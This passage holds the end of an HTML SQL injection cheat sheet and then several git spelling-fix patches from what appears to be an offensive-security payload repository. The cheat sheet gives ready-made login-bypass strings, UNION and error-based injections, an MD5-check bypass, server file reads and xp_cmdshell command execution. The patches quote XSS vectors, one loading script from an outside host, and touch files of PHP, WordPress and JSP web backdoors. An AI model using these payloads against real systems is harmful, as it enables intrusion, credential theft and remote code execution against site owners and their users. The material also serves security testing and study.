</code></li> </ul>  <p class="idea"><strong>*About MySQL "||";</strong>     <br />If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using <code>CONCAT()</code> function in MySQL.</p>  <ul type="disc">   <li><code>CONCAT(str1, str2, str3, ...)</code> (M)       <br /><span class="idea">Concatenate supplied strings.</span>       <br /><code>SELECT <span class="hi">CONCAT(login, password)</span> FROM members</code> </li> </ul>  <h3><a id="StringwithoutQuotes" name="StringwithoutQuotes"></a>Strings without Quotes </h3>  <p class="idea">These are some direct ways to using strings but it’s always possible to use <code>CHAR()</code>(MS) and <code>CONCAT()</code>(M) to generate string without quotes.</p>  <ul type="disc">   <li><code>0x457578</code> (M) - <span class="idea">Hex Representation of string </span>      <br /><code>SELECT 0x457578</code>       <br /><span class="idea">This will be selected as string in MySQL.</span>       <br />      <br /><span class="idea">In MySQL easy way to generate hex representations of strings use this;</span>       <br /><code>SELECT CONCAT('0x',HEX('c:\\boot.ini'))</code>       <br />      <br /></li>    <li><span class="idea">Using <code>CONCAT()</code> in MySQL</span>       <br /><code>SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))</code> (M)       <br /><span class="idea">This will return ‘KLM’.</span>       <br />      <br /></li>    <li><code>SELECT CHAR(75)+CHAR(76)+CHAR(77)</code> (S)       <br /><span class="idea">This will return ‘KLM’. </span></li> </ul>  <h4><a id="HexbasedSamples" name="HexbasedSamples"></a>Hex based SQL Injection Samples</h4>  <ul>   <li><code>SELECT LOAD_FILE(<span class="hi">0x633A5C626F6F742E696E69</span>)</code> (M)       <br /><span class="idea">This will show the content of <strong>c:\boot.ini</strong></span> </li> </ul>  <h3><a id="StringModification" name="StringModification"></a>String Modification & Related </h3>  <ul type="disc">   <li><code>ASCII()</code> (SMP)       <br /><span class="idea">Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.</span>       <br />      <br /><code>SELECT ASCII('a')</code>       <br />      <br /></li>    <li><code>CHAR()</code> (SM)       <br /><span class="idea">Convert an integer of ASCII.</span>       <br />      <br /><code>SELECT CHAR(64)</code> </li> </ul>  <h2><a id="UnionInjections" name="UnionInjections"></a>Union Injections</h2>  <p class="idea">With union you do SQL queries cross-table. Basically you can poison query to return records from another table. </p>  <p><code>SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members </code>    <br /><span class="idea">This will combine results from both news table and members table and return all of them. </span></p>  <p><span class="idea">Another Example : </span>    <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>UNION – Fixing Language Issues</h3>  <p class="idea">While exploiting Union injections sometimes you get errors because of different language settings (<em>table settings, field settings, combined table / db settings etc.</em>) these functions are quite useful to fix this problem. It's rare but if you dealing with <em>Japanese, Russian, Turkish</em> etc. applications then you will see it. </p>  <ul>   <li>SQL Server (S)      <br />Use <span class="hi"><code>field</code> <strong><code>COLLATE</code></strong><code> SQL_Latin1_General_Cp1254_CS_AS</code></span> or some other valid one - <em>check out SQL Server documentation</em>.       <br />      <br /><code>SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</code>       <br />      <br /></li>    <li>MySQL (M)      <br /><code>Hex() </code><span class="idea">for every possible issue</span> </li> </ul>  <h3><a id="ByPassingLoginScreens" name="ByPassingLoginScreens"></a>Bypassing Login Screens (SMO+) </h3> <span class="idea"><em>SQL Injection 101</em>, Login tricks </span>  <ul>   <li><code>admin' -- </code></li>    <li><code>admin' # </code></li>    <li><code>admin'/*</code> </li>    <li><code>' or 1=1--</code> </li>    <li><code>' or 1=1#</code> </li>    <li><code>' or 1=1/*</code> </li>    <li><code>') or '1'='1--</code> </li>    <li><code>') or ('1'='1--</code> </li>    <li>.... </li> </ul>  <ul>   <li>Login as different user (SM*)      <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code> </li> </ul>  <p><em>*Old versions of MySQL doesn't support union queries </em></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>Bypassing second MD5 hash check login screens </h3>  <p class="idea">If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. </p>  <h4><a id="BypassingMD5Hash" name="BypassingMD5Hash"></a>Bypassing MD5 Hash Check Example (MSP) </h4>  <p><span class="inputfield">Username :</span><code> admin</code>     <br /><span class="inputfield">Password :</span> <code>1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</code></p>  <p><code>81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) </code></p>  <h3> </h3>  <h3>Error Based - Find Columns Names </h3>  <h4>Finding Column Names with <strong>HAVING BY</strong> - Error Based (S) </h4>  <p><em>In the same order, </em></p>  <ul>   <li>'<code> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1</strong> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2</strong> HAVING 1=1 --</code> </li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2, columnfromerror(n) </strong>HAVING 1=1 --</code> <em>and so on</em> </li>    <li>If you are not getting any more error then it's done. </li> </ul>  <h4>Finding how many columns in SELECT query by <strong>ORDER BY</strong> <strong>(MSO+)</strong></h4>  <p>Finding column number by ORDER BY can speed up the UNION SQL Injection process.</p>  <ul>   <li><code>ORDER BY 1-- </code></li>    <li><code>ORDER BY 2--</code> </li>    <li><code>ORDER BY N--</code> <em>so on</em> </li>    <li>Keep going until get an error. Error means you found the number of selected columns. </li> </ul>  <h3>Data types, UNION, etc. </h3>  <h4>Hints,</h4>  <ul>   <li>Always use <strong>UNION</strong> with <strong>ALL </strong>because of <strong>image</strong> similar non-distinct field types. By default union tries to get records with distinct. </li>    <li>To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (<em>if injection is in WHERE</em>). This can be critical if you are only getting one result at a time. </li>    <li>Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.      <ul>       <li>Be careful in Blind situations may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (<em>because normally developers are not expecting to see NULL in a username field</em>) </li>     </ul>   </li> </ul>  <h4>Finding Column Type </h4>  <ul>   <li><code>' union select <span class="hi">sum(<strong>columntofind</strong>)</span> from <strong>users</strong>--</code> (S)       <br /><code>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'        <br />[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a <strong class="hi">varchar</strong> data type as an argument.</code>       <br />      <br /><em>If you are not getting error it means </em>column is numeric.       <br />      <br /></li>    <li>Also you can use <span class="hi">CAST()</span> or <span class="hi">CONVERT()</span>       <ul>       <li><code>SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</code>           <br />          <br /></li>     </ul>   </li>    <li><code>11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error - Syntax is right. MS SQL Server Used. Proceeding.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – First column is an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </code>      <br />Error! – Second column is not an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – Second column is a string.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-</code>       <br />Error! – Third column is not an integer. ...       <br />      <br /><code>Microsoft OLE DB Provider for SQL Server error '80040e07'        <br />Explicit conversion from data type <span class="hi"><strong>int</strong> to image</span> is not allowed.</code> </li> </ul>  <p><strong>You’ll get convert() errors before union target errors ! </strong>So<strong> </strong>start with<strong> </strong>convert() then union<strong></strong></p>  <h3>Simple Insert (MSO+) </h3> <code>'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</code>   <h3>Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes</h3>  <p><strong>@@version</strong> (MS)     <br />Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions. </p>  <p><code>INSERT INTO members(id, user, pass) VALUES(1, ''+<span class="hi">SUBSTRING(@@version,1,10)</span> ,10)</code></p>  <h4><a id="BulkInsert" name="BulkInsert"></a>Bulk Insert (S) </h4>  <p>Insert a file content to a table. If you don't know internal path of web application you can <strong>read IIS (</strong><em>IIS 6 only</em><strong>) metabase file </strong>(<em>%systemroot%\system32\inetsrv\MetaBase.xml</em>) and then search in it to identify application path. </p>  <ol>   <ol>     <li>Create table foo( line varchar(8000) ) </li>      <li>bulk insert foo from 'c:\inetpub\wwwroot\login.asp' </li>      <li><em>Drop temp table, and repeat for another file. </em></li>   </ol> </ol>  <h4>BCP (S) </h4>  <p>Write text file. Login Credentials are required to use this function.    <br /><code>bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar </code></p>  <h4>VBS, WSH in SQL Server (S) </h4>  <p>You can use VBS, WSH scripting in SQL Server because of ActiveX support. </p>  <p><code>declare @o int      <br />exec sp_oacreate 'wscript.shell', @o out       <br />exec sp_oamethod @o, 'run', NULL, 'notepad.exe'       <br /></code><code><em>Username:</em> '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --       <br /></code></p>  <h4>Executing system commands, xp_cmdshell (S) </h4>  <p>Well known trick, By default it's disabled in <em>SQL Server 2005. </em>You need to have admin access. </p>  <p><code>EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</code>     <br /></p>  <p>Simple ping check (<em>configure your firewall or sniffer to identify request before launch it</em>), </p>  <p><code>EXEC master.dbo.xp_cmdshell 'ping <ip address>'</code></p>  <p>You can not read results directly from error or union or something else. </p>  <h4>Some Special Tables in SQL Server (S) </h4>  <ul>   <li>Error Messages      <br /><code>master..sysmessages </code>      <br />      <br /></li>    <li>Linked Servers      <br /><code>master..sysservers</code>       <br />      <br /></li>    <li>Password (<em>2000 and 20005 both can be crackable, they use very similar hashing algorithm </em>)       <br />SQL Server 2000:<code> masters..sysxlogins</code>       <br />SQL Server 2005 : <code>sys.sql_logins        <br /></code></li> </ul>  <h4>More Stored Procedures for SQL Server (S) </h4>  <ol>   <li>Cmd Execute (<strong>xp_cmdshell</strong>)       <br />exec master..xp_cmdshell 'dir'       <br />      <br /></li>    <li>Registry Stuff (<strong>xp_regread</strong>)       <br />      <ol>       <li>xp_regaddmultistring </li>        <li>xp_regdeletekey </li>        <li>xp_regdeletevalue </li>        <li>xp_regenumkeys </li>        <li>xp_regenumvalues </li>        <li>xp_regread </li>        <li>xp_regremovemultistring </li>        <li>xp_regwrite          <br />exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'           <br />exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'           <br />          <br /></li>     </ol>   </li>    <li>Managing Services (<strong>xp_servicecontrol</strong>)       <br /></li>    <li>Medias (<strong>xp_availablemedia</strong>)       <br /></li>    <li>ODBC Resources (<strong>xp_enumdsn</strong>)       <br /></li>    <li>Login mode (<strong>xp_loginconfig</strong>)       <br /></li>    <li>Creating Cab Files (<strong>xp_makecab</strong>)       <br /></li>    <li>Domain Enumeration (<strong>xp_ntsec_enumdomains</strong>)       <br /></li>    <li>Process Killing (<em>need PID</em>) (<strong>xp_terminate_process</strong>)       <br /></li>    <li>Add new procedure (<em>virtually you can execute whatever you want</em>)       <br />sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’       <br />exec xp_webserver </li>    <li>Write text file to a UNC or an internal path (sp_makewebtask)      <br /></li> </ol>  <h4>MSSQL Bulk Notes </h4>  <p><code>SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ </code></p>  <p><code>DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</code></p>  <p>HOST_NAME()    <br />IS_MEMBER (Transact-SQL)  <br />IS_SRVROLEMEMBER (Transact-SQL)  <br />OPENDATASOURCE (Transact-SQL) </p>  <pre>INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"</pre>
 
 <p>OPENROWSET (Transact-SQL)  - <a href="http://msdn2.microsoft.com/en-us/library/ms190312.aspx">http://msdn2.microsoft.com/en-us/library/ms190312.aspx</a></p>
 

From 73e47ae3291ef2bdfd2a202deb617dda10b143db Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:36 -0400
Subject: [PATCH 52/59] spelling: specified

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index e89f7226..cef040b4 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -173,7 +173,7 @@ <h3>Waiting For Blind SQL Injections</h3>
 
 <h4>WAIT FOR DELAY 'time' (S) </h4>
 
-<p>This is just like sleep, wait for spesified time. CPU safe way to make database wait. </p>
+<p>This is just like sleep, wait for specified time. CPU safe way to make database wait. </p>
 
 <p><code>WAITFOR DELAY '0:0:10'--</code></p>
 

From 10f02c505ae31b8ebc6faafd2a2d89054a198a48 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:37 -0400
Subject: [PATCH 53/59] spelling: spetsnaz

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 regex/nsa-wordlist.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/regex/nsa-wordlist.txt b/regex/nsa-wordlist.txt
index a1b021fd..b502fe41 100644
--- a/regex/nsa-wordlist.txt
+++ b/regex/nsa-wordlist.txt
@@ -212,7 +212,7 @@ MI6
 Kh-11
 Shayet-13
 SADMS
-Spetznaz
+Spetsnaz
 Recce
 707
 CIO

From 6c4d0dfce1f4827a5dd5efa8a00f444f10cb7ce1 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:38 -0400
Subject: [PATCH 54/59] spelling: suppress

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index 27a9eddf..54d07aec 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -427,7 +427,7 @@ Author Name: ha.ckers.org
 Extraneous Open Brackets
 Exploit Name: Extraneous Open Brackets
 Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT>
-Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to supress a JavaScript error.
+Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/).  This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorithm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course).  The double slash comments out the ending extraneous bracket to suppress a JavaScript error.
 Exploit Tags: general, obfuscated
 Author Name: ha.ckers.org
 

From dc0481159048b590c5f5e941ea1a6e70e3e28927 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:39 -0400
Subject: [PATCH 55/59] spelling: suspicious

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 regex/nsa-wordlist.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/regex/nsa-wordlist.txt b/regex/nsa-wordlist.txt
index b502fe41..3c2b114d 100644
--- a/regex/nsa-wordlist.txt
+++ b/regex/nsa-wordlist.txt
@@ -1008,6 +1008,6 @@ China
 Conficker
 Worm
 Scammers
-Suspecious
+Suspicious
 Social media
 

From 86e0850391890cefa77deec3cd39871074652fd6 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:42 -0400
Subject: [PATCH 56/59] spelling: temporarily

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/php/dns.php                    | 2 +-
 web-backdoors/php/file.php                   | 2 +-
 web-backdoors/php/host.php                   | 2 +-
 web-backdoors/php/killnc.php                 | 2 +-
 web-backdoors/php/proxy.php                  | 2 +-
 web-backdoors/php/shell.php                  | 2 +-
 web-backdoors/wordpress/templates/dns.php    | 2 +-
 web-backdoors/wordpress/templates/file.php   | 2 +-
 web-backdoors/wordpress/templates/host.php   | 2 +-
 web-backdoors/wordpress/templates/killnc.php | 2 +-
 web-backdoors/wordpress/templates/proxy.php  | 2 +-
 web-backdoors/wordpress/templates/shell.php  | 2 +-
 12 files changed, 12 insertions(+), 12 deletions(-)

diff --git a/web-backdoors/php/dns.php b/web-backdoors/php/dns.php
index 71a8c57f..08437b43 100644
--- a/web-backdoors/php/dns.php
+++ b/web-backdoors/php/dns.php
@@ -60,7 +60,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/file.php b/web-backdoors/php/file.php
index be622b75..c2e9b9fe 100644
--- a/web-backdoors/php/file.php
+++ b/web-backdoors/php/file.php
@@ -61,7 +61,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/host.php b/web-backdoors/php/host.php
index 362611af..79d3480f 100644
--- a/web-backdoors/php/host.php
+++ b/web-backdoors/php/host.php
@@ -59,7 +59,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/killnc.php b/web-backdoors/php/killnc.php
index 24017a68..8cab9b12 100644
--- a/web-backdoors/php/killnc.php
+++ b/web-backdoors/php/killnc.php
@@ -62,7 +62,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/proxy.php b/web-backdoors/php/proxy.php
index e3807a37..08eaf231 100644
--- a/web-backdoors/php/proxy.php
+++ b/web-backdoors/php/proxy.php
@@ -62,7 +62,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/php/shell.php b/web-backdoors/php/shell.php
index 4373f361..dcd55824 100644
--- a/web-backdoors/php/shell.php
+++ b/web-backdoors/php/shell.php
@@ -68,7 +68,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/dns.php b/web-backdoors/wordpress/templates/dns.php
index 4d4f1bc4..ce1b5688 100644
--- a/web-backdoors/wordpress/templates/dns.php
+++ b/web-backdoors/wordpress/templates/dns.php
@@ -43,7 +43,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/file.php b/web-backdoors/wordpress/templates/file.php
index 181ae251..0a34c204 100644
--- a/web-backdoors/wordpress/templates/file.php
+++ b/web-backdoors/wordpress/templates/file.php
@@ -47,7 +47,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/host.php b/web-backdoors/wordpress/templates/host.php
index 726e0db1..f3f75664 100644
--- a/web-backdoors/wordpress/templates/host.php
+++ b/web-backdoors/wordpress/templates/host.php
@@ -43,7 +43,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/killnc.php b/web-backdoors/wordpress/templates/killnc.php
index 2442243d..089f38f4 100644
--- a/web-backdoors/wordpress/templates/killnc.php
+++ b/web-backdoors/wordpress/templates/killnc.php
@@ -46,7 +46,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/proxy.php b/web-backdoors/wordpress/templates/proxy.php
index c687c812..76e4a194 100644
--- a/web-backdoors/wordpress/templates/proxy.php
+++ b/web-backdoors/wordpress/templates/proxy.php
@@ -47,7 +47,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {
diff --git a/web-backdoors/wordpress/templates/shell.php b/web-backdoors/wordpress/templates/shell.php
index 70e72387..21757f32 100644
--- a/web-backdoors/wordpress/templates/shell.php
+++ b/web-backdoors/wordpress/templates/shell.php
@@ -47,7 +47,7 @@
 /* This error handler will turn all notices, warnings, and errors into fatal
  * errors, unless they have been suppressed with the @-operator. */
 function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
-    /* The @-operator (used with chdir() below) temporarely makes
+    /* The @-operator (used with chdir() below) temporarily makes
      * error_reporting() return zero, and we don't want to die in that case.
      * We do note the error in the output, though. */
     if (error_reporting() == 0) {

From 8af8a2675f064f102311f43e579c82316f4738d7 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:43 -0400
Subject: [PATCH 57/59] spelling: useful

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 web-backdoors/jsp/browser.jsp | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/web-backdoors/jsp/browser.jsp b/web-backdoors/jsp/browser.jsp
index 3d10dbd6..c781a253 100755
--- a/web-backdoors/jsp/browser.jsp
+++ b/web-backdoors/jsp/browser.jsp
@@ -66,7 +66,7 @@
 	 */
 	private static final int COMPRESSION_LEVEL = 1;
 	/**
-	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
+	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be useful, if the
 	 * server runs on a windows platform, to avoid a message box, if you try to access
 	 * an empty removable drive (See KNOWN BUGS in Readme.txt).
 	 */

From 6087f36c8377aa7068517599c64c90a105f283bb Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:44 -0400
Subject: [PATCH 58/59] spelling: verification

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/file-upload/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/file-upload/README.md b/attack/file-upload/README.md
index b51f13ab..5a26f2c4 100644
--- a/attack/file-upload/README.md
+++ b/attack/file-upload/README.md
@@ -4,7 +4,7 @@ see:  http://cwe.mitre.org/data/definitions/434.html
 
 * kinds of file upload verifications:
  * content-type
- * filename extension verificationi (whitelist, blacklist)
+ * filename extension verification (whitelist, blacklist)
  * file content checking
  * client side, ha ha ha
 

From 6a4b70d411d86fa25ccfea5769d9d3f0c748f306 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:45 -0400
Subject: [PATCH 59/59] spelling: where

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
index 54d07aec..081299c0 100644
--- a/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
+++ b/attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt
@@ -547,7 +547,7 @@ Author Name: .mario
 IE closing-tag expression injection
 Exploit Name: IE closing-tag expression injection
 Exploit String: </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
-Exploit Description: This vector exploits a bug in IE whre attributes in closing comments are evaluated.
+Exploit Description: This vector exploits a bug in IE where attributes in closing comments are evaluated.
 Exploit Tags: general, injection, internet explorer
 Author Name: .mario